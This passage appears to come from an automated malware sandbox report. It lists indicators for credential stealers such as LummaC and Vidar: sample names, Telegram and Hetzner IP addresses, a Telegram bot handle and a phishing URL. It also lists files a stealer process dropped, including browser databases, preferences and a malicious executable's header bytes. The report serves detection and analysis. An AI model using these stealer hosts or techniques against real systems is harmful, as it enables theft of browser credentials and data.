                                                                                                                                                                                                                                                              http://telegramtw1.org/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                              • telegram.org/?setln=pl
                                                                                                                                                                                                                                                              http://makkko.kz/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                              • telegram.org/
                                                                                                                                                                                                                                                              http://telegram.dogGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                              • telegram.dog/
                                                                                                                                                                                                                                                              LnSNtO8JIa.exeGet hashmaliciousCinoshi StealerBrowse
                                                                                                                                                                                                                                                              • t.me/cinoshibot
                                                                                                                                                                                                                                                              jtfCFDmLdX.exeGet hashmaliciousGurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, zgRATBrowse
                                                                                                                                                                                                                                                              • t.me/cinoshibot
                                                                                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                              toptek.sbsAmsterdamCryptoLTD.exeGet hashmaliciousLummaC, DarkComet, LummaC Stealer, VidarBrowse
                                                                                                                                                                                                                                                              • 94.130.188.57
                                                                                                                                                                                                                                                              GoldenContinent.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                              • 94.130.188.57
                                                                                                                                                                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                              • 94.130.188.57
                                                                                                                                                                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, XmrigBrowse
                                                                                                                                                                                                                                                              • 94.130.188.57
                                                                                                                                                                                                                                                              t.meAmsterdamCryptoLTD.exeGet hashmaliciousLummaC, DarkComet, LummaC Stealer, VidarBrowse
                                                                                                                                                                                                                                                              • 149.154.167.99
                                                                                                                                                                                                                                                              GoldenContinent.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                              • 149.154.167.99
                                                                                                                                                                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                              • 149.154.167.99
                                                                                                                                                                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, XmrigBrowse
                                                                                                                                                                                                                                                              • 149.154.167.99
                                                                                                                                                                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, XmrigBrowse
                                                                                                                                                                                                                                                              • 149.154.167.99
                                                                                                                                                                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Vidar, XmrigBrowse
                                                                                                                                                                                                                                                              • 149.154.167.99
                                                                                                                                                                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, XmrigBrowse
                                                                                                                                                                                                                                                              • 149.154.167.99
                                                                                                                                                                                                                                                              https://l.facebook.com/l.php?u=https%3A%2F%2Ft.me%2FPAWSOG_bot%2FPAWS%3Fstartapp%3Dy6XarDUx%26fbclid%3DIwZXh0bgNhZW0CMTAAAR3IsDSVMcBgD-KKIyBXkOWfUkEFRcacr_vOCRRmviPmkFBUb89K461Xors_aem_phLdcKrpf4KWQzIltAO6sg&h=AT0WVJB1xqSKqrvz6oCyiCr2S_kisddMHHYmkei4Ws2sbL4pRphOmNE4PXT0dksI9PktkcW4m87_ll8cIS3t1M10038szd68S2XeJYojq6dQAb2PNvHsZFU9AcnVKku-Ww&__tn__=R%5D-R&c%5B0%5D=AT333mRdaoK-Yj4Ygf4lXueSR8jJ8CACMU4jPPhyx4Dd8BU65ez-7IWN-rjEtxmQ4vnelW50DVCFSTPJgFIJWEEx8TitUX4wIVY-t-NciHl77nL94VWL9IfsUrTxvCQB2zyPBhLoYnhspB5Xwyppb4fz5drOP91P-bJPoqSIEG9eoaQFOXaOYJeNVBj8A6jTCbgB-MXs3Mr2iqYLeO7DnF-q9v0FShLlwJK2Dtzfkv1OxBm45LKEAXAPoI199zlXmZpVMznjGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                              • 149.154.167.99
                                                                                                                                                                                                                                                              ktyihkdfesf.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                              • 149.154.167.99
                                                                                                                                                                                                                                                              pjthjsdjgjrtavv.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                              • 149.154.167.99
                                                                                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                              TELEGRAMRUtg.exeGet hashmaliciousBabadedaBrowse
                                                                                                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                                                                                                              tg.exeGet hashmaliciousBabadedaBrowse
                                                                                                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                                                                                                              setup.exeGet hashmaliciousBabadedaBrowse
                                                                                                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                                                                                                              AmsterdamCryptoLTD.exeGet hashmaliciousLummaC, DarkComet, LummaC Stealer, VidarBrowse
                                                                                                                                                                                                                                                              • 149.154.167.99
                                                                                                                                                                                                                                                              GoldenContinent.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                              • 149.154.167.99
                                                                                                                                                                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                              • 149.154.167.99
                                                                                                                                                                                                                                                              user.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, XmrigBrowse
                                                                                                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                              • 149.154.167.99
                                                                                                                                                                                                                                                              HETZNER-ASDEAmsterdamCryptoLTD.exeGet hashmaliciousLummaC, DarkComet, LummaC Stealer, VidarBrowse
                                                                                                                                                                                                                                                              • 94.130.188.57
                                                                                                                                                                                                                                                              Loader.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                              • 213.239.239.164
                                                                                                                                                                                                                                                              GoldenContinent.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                              • 94.130.188.57
                                                                                                                                                                                                                                                              https://cpanel05wh.bkk1.cloud.z.com/~cp197720/open/DD/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                              • 135.181.58.223
                                                                                                                                                                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                              • 94.130.188.57
                                                                                                                                                                                                                                                              https://gogvo.com/redir.php?url=https://atratejarat.com/wp-content/red/DhmgvVGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                              • 136.243.5.53
                                                                                                                                                                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                              • 94.130.188.57
                                                                                                                                                                                                                                                              nshsh4.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                              • 95.217.252.201
                                                                                                                                                                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, XmrigBrowse
                                                                                                                                                                                                                                                              • 94.130.188.57
                                                                                                                                                                                                                                                              powerpc.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                                                                                              • 188.40.81.35
                                                                                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                              37f463bf4616ecd445d4a1937da06e19setup.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                              • 94.130.188.57
                                                                                                                                                                                                                                                              • 149.154.167.99
                                                                                                                                                                                                                                                              Setup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                              • 94.130.188.57
                                                                                                                                                                                                                                                              • 149.154.167.99
                                                                                                                                                                                                                                                              Setup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                              • 94.130.188.57
                                                                                                                                                                                                                                                              • 149.154.167.99
                                                                                                                                                                                                                                                              AmsterdamCryptoLTD.exeGet hashmaliciousLummaC, DarkComet, LummaC Stealer, VidarBrowse
                                                                                                                                                                                                                                                              • 94.130.188.57
                                                                                                                                                                                                                                                              • 149.154.167.99
                                                                                                                                                                                                                                                              installer.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                              • 94.130.188.57
                                                                                                                                                                                                                                                              • 149.154.167.99
                                                                                                                                                                                                                                                              GoldenContinent.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                              • 94.130.188.57
                                                                                                                                                                                                                                                              • 149.154.167.99
                                                                                                                                                                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                                                                              • 94.130.188.57
                                                                                                                                                                                                                                                              • 149.154.167.99
                                                                                                                                                                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                              • 94.130.188.57
                                                                                                                                                                                                                                                              • 149.154.167.99
                                                                                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\245347\Dry.comWine.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                  GoldenContinent.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                      Full-Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                          Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                                                            Full-Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, XmrigBrowse
                                                                                                                                                                                                                                                                                file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, XmrigBrowse
                                                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\245347\Dry.com
                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):114688
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.9746603542602881
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                                                                                                                                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                                                                                                                                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                                                                                                                                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                                                                                                                                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\245347\Dry.com
                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 32768, file counter 2, database pages 9, cookie 0x6, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):294912
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.08436842005578409
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:192:5va0zkVmvQhyn+Zoz679fqlQbGhMHPaVAL23vIn:51zkVmvQhyn+Zoz67n
                                                                                                                                                                                                                                                                                  MD5:2CD2840E30F477F23438B7C9D031FC08
                                                                                                                                                                                                                                                                                  SHA1:03D5410A814B298B068D62ACDF493B2A49370518
                                                                                                                                                                                                                                                                                  SHA-256:49F56AAA16086F2A9DB340CC9A6E8139E076765C1BFED18B1725CC3B395DC28D
                                                                                                                                                                                                                                                                                  SHA-512:DCDD722C3A8AD79265616ADDDCA208E068E4ECEBE8820E4ED16B1D1E07FD52EB3A59A22988450071CFDA50BBFF7CB005ADF05A843DA38421F28572F3433C0F19
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j......z<.{...{.{a{.z.z<z.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\245347\Dry.com
                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):106496
                                                                                                                                                                                                                                                                                  Entropy (8bit):1.1358696453229276
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                                                                                                                                  MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                                                                                                                                  SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                                                                                                                                  SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                                                                                                                                  SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\245347\Dry.com
                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):159744
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.7873599747470391
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                                                                                                                                                                                                  MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                                                                                                                                                                                                  SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                                                                                                                                                                                                  SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                                                                                                                                                                                                  SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\245347\Dry.com
                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):98304
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.08235737944063153
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                                                                                                                                                                                  MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                                                                                                                                                                                  SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                                                                                                                                                                                  SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                                                                                                                                                                                  SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\245347\Dry.com
                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):126976
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.47147045728725767
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                                                                                                                                                                                                  MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                                                                                                                                                                                                  SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                                                                                                                                                                                                  SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                                                                                                                                                                                                  SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\245347\Dry.com
                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):40960
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.8553638852307782
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                                                                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                                                                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                                                                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                                                                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\245347\Dry.com
                                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (1809), with CRLF line terminators
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):9571
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.536643647658967
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:192:qnaRt+YbBp6ihj4qyaaX86KKkfGNBw8DJSl:yegqumcwQ0
                                                                                                                                                                                                                                                                                  MD5:5D8E5D85E880FB2D153275FCBE9DA6E5
                                                                                                                                                                                                                                                                                  SHA1:72332A8A92B77A8B1E3AA00893D73FC2704B0D13
                                                                                                                                                                                                                                                                                  SHA-256:50490DC0D0A953FA7D5E06105FE9676CDB9B49C399688068541B19DD911B90F9
                                                                                                                                                                                                                                                                                  SHA-512:57441B4CCBA58F557E08AAA0918D1F9AC36D0AF6F6EB3D3C561DA7953ED156E89857FFB829305F65D220AE1075BC825F131D732B589B5844C82CA90B53AAF4EE
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "57f16a19-e119-4073-bf01-28f88011f783");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696333830);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696333856);..user_pref("app.update.lastUpdateTime.xpi-signature-verification
                                                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\245347\Dry.com
                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):49152
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.8180424350137764
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                                                                                                                                                                  MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                                                                                                                                                                  SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                                                                                                                                                                  SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                                                                                                                                                                  SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\245347\Dry.com
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):1787
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.36170862061985
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:48:SfNaoCtTECifNaoCqPCqfNaoCBC5fNaoCklI0UrU0U8CkQ:6NnCtTECKNnCwCyNnCBCVNnCH0UrU0Ub
                                                                                                                                                                                                                                                                                  MD5:679996B81C50D92A2350C21D0435855A
                                                                                                                                                                                                                                                                                  SHA1:CC7AC60AE481C310EB0E14C571BE59D2580B0285
                                                                                                                                                                                                                                                                                  SHA-256:0F26A6EF3AA1D5905FFFC21618D68AE3CB9CC813A16E216F3E9B574AE7631BB6
                                                                                                                                                                                                                                                                                  SHA-512:A2A387C735ED2359205D9E8914C3E22912796A8A00ABD09A62E4A2A4CA79C497834612DAB5E15F1FAB803FB8864CD3F8A5B3187D04DA944724E17AD0103EF236
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:[ {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/507FD03D7763A0807809AC4BFB737878",.. "id": "507FD03D7763A0807809AC4BFB737878",.. "title": "Google Network Speech",.. "type": "background_page",.. "url": "chrome-extension://neajdppkdcdipfabeoofebfddakdcjhd/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/507FD03D7763A0807809AC4BFB737878"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/49120268499C74A909177616D9EEC705",.. "id": "49120268499C74A909177616D9EEC705",.. "title": "Google Hangouts",.. "type": "background_page",.. "url": "chrome-extension://nkeimhogjdpnpccoofpliimaahmaaome/background.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/49120268499C74A909177616D9EEC705"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtoo
                                                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                  Category:modified
                                                                                                                                                                                                                                                                                  Size (bytes):947288
                                                                                                                                                                                                                                                                                  Entropy (8bit):6.630612696399572
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:24576:uvG4FEq/TQ+Svbi3zcNjmsuENOJuM8WU2a+BYK:u9GqLQHbijkmc2umva+OK
                                                                                                                                                                                                                                                                                  MD5:62D09F076E6E0240548C2F837536A46A
                                                                                                                                                                                                                                                                                  SHA1:26BDBC63AF8ABAE9A8FB6EC0913A307EF6614CF2
                                                                                                                                                                                                                                                                                  SHA-256:1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
                                                                                                                                                                                                                                                                                  SHA-512:32DE0D8BB57F3D3EB01D16950B07176866C7FB2E737D9811F61F7BE6606A6A38A5FC5D4D2AE54A190636409B2A7943ABCA292D6CEFAA89DF1FC474A1312C695F
                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                  Joe Sandbox View:
                                                                                                                                                                                                                                                                                  • Filename: Wine.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                  • Filename: Setup.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                  • Filename: GoldenContinent.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                  • Filename: Full-Setup.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                  • Filename: Setup.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                  • Filename: Setup.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                  • Filename: Full-Setup.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\cmd.exe
